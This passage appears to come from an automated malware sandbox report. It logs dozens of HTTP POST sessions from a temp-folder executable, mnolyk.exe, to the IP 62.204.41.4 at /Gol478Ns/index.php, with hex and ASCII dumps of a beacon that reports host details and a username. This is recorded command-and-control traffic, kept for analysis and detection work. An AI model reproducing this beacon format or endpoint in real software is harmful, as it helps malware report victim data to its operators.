                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:01.220072985 CET597INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          45192.168.2.64976462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:01.795053005 CET158OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:01.859669924 CET158INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          450192.168.2.65017462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:01.410758972 CET598OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:01.474220991 CET598INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          451192.168.2.65017562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:01.662458897 CET599OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:01.726902008 CET599INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          452192.168.2.65017662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:01.908838034 CET600OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:01.974292994 CET600INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          453192.168.2.65017762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:02.166311026 CET601OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:02.231512070 CET601INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          454192.168.2.65017862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:02.400607109 CET602OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:02.463025093 CET602INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          455192.168.2.65017962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:02.638946056 CET603OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:02.702853918 CET603INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          456192.168.2.65018062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:02.871685982 CET604OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:02.937747002 CET604INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          457192.168.2.65018262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:03.137172937 CET611OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:03.200685024 CET612INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          458192.168.2.65018362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:03.375286102 CET613OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:03.439560890 CET613INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          459192.168.2.65018462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:03.616189957 CET614OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:03.680015087 CET614INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          46192.168.2.64976562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:02.096121073 CET159OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:02.162086964 CET159INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          460192.168.2.65018562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:03.865291119 CET615OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:03.927962065 CET615INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          461192.168.2.65018662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:04.107235909 CET616OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:04.172255039 CET616INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          462192.168.2.65018762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:04.340648890 CET617OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:04.403584957 CET617INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          463192.168.2.65018862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:04.590702057 CET618OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:04.655025959 CET618INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          464192.168.2.65018962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:04.831774950 CET619OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:04.896188974 CET619INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          465192.168.2.65019062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:05.082669020 CET620OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:05.148695946 CET620INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          466192.168.2.65019162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:05.327790976 CET621OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:05.391647100 CET621INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          467192.168.2.65019262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:05.567548990 CET622OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:05.630932093 CET622INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          468192.168.2.65019362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:05.833350897 CET623OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
